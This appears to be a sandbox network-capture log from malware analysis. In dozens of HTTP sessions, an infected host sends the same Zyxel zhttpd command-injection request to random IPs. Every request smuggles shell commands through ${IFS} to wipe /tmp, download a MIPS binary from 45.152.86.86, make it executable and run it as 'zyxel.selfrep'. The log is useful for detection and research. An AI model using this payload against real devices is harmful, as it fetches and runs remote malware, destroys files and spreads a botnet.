                              Mar 31, 2024 08:42:05.313213110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8285192.168.2.1333164180.85.170.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.313249111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8286192.168.2.1358244106.94.150.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.313286066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8287192.168.2.135493413.235.222.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325113058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8288192.168.2.1333070134.15.59.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325171947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8289192.168.2.133737850.85.226.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325213909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8290192.168.2.1349608123.201.59.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325248957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8291192.168.2.133499250.52.67.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325323105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8292192.168.2.1356852134.13.85.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325381994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8293192.168.2.135030868.163.23.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325436115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8294192.168.2.13602789.250.184.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325475931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8295192.168.2.1349712218.90.192.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325529099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8296192.168.2.135987447.216.72.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325572968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8297192.168.2.1349862168.48.226.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325635910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8298192.168.2.135048086.140.192.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325692892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8299192.168.2.1345524143.186.163.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325727940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8300192.168.2.1336340106.148.90.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325795889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8301192.168.2.1335766221.23.19.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325829029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8302192.168.2.1337678117.48.23.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325886965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8303192.168.2.1340694136.253.68.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325953960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8304192.168.2.134293060.122.192.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.325984955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8305192.168.2.1342994169.131.51.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326045036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8306192.168.2.1343232197.236.232.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326101065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8307192.168.2.136021678.16.75.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326165915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8308192.168.2.134684234.253.229.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326215982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8309192.168.2.133714685.224.193.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326272011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8310192.168.2.134872262.112.50.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326318026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8311192.168.2.1333076184.60.172.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326370001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8312192.168.2.1347216142.216.243.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326440096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8313192.168.2.1351378114.217.125.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326471090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8314192.168.2.1334278154.195.80.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326523066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8315192.168.2.1356828219.151.114.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326590061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8316192.168.2.134350893.253.0.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326647043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8317192.168.2.1347696164.210.40.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326694965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8318192.168.2.134676488.7.130.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326765060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8319192.168.2.1359190172.83.160.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326807976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8320192.168.2.1351268194.122.40.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326872110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8321192.168.2.1356830212.188.16.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326917887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8322192.168.2.13456149.50.160.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.326966047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8323192.168.2.135267650.180.240.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327025890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8324192.168.2.136012078.162.229.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327078104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8325192.168.2.1336334119.166.25.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327116013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8326192.168.2.1347798162.83.199.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327164888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8327192.168.2.1345064205.86.31.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327224970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8328192.168.2.133882093.214.201.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327280998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8329192.168.2.133516084.50.244.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327331066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8330192.168.2.133348625.24.51.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327388048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8331192.168.2.1356654124.166.246.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327434063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8332192.168.2.134501436.149.55.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327497005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8333192.168.2.13419228.54.78.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327539921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8334192.168.2.1349032117.66.69.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327609062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8335192.168.2.1341716101.149.211.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327641964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8336192.168.2.133753667.74.205.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327687979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8337192.168.2.135047425.174.34.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327766895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8338192.168.2.134288487.186.121.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327802896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8339192.168.2.134877613.126.130.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327857018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8340192.168.2.1355696150.210.36.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327920914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8341192.168.2.133287261.201.76.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.327955008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8342192.168.2.1349274158.147.197.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328021049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8343192.168.2.1340882118.143.232.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328052044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8344192.168.2.1355922132.72.16.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328114986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8345192.168.2.1335948159.208.8.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328155041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8346192.168.2.136009482.253.54.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328188896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8347192.168.2.133361444.104.25.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328259945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8348192.168.2.135002831.33.99.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328315973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8349192.168.2.1342458121.102.48.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328382015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8350192.168.2.1334716194.202.253.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328439951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8351192.168.2.133460846.22.217.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328465939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8352192.168.2.1341956107.94.240.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328531981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8353192.168.2.1356152179.231.82.199443
                              TimestampBytes transferredDirectionData
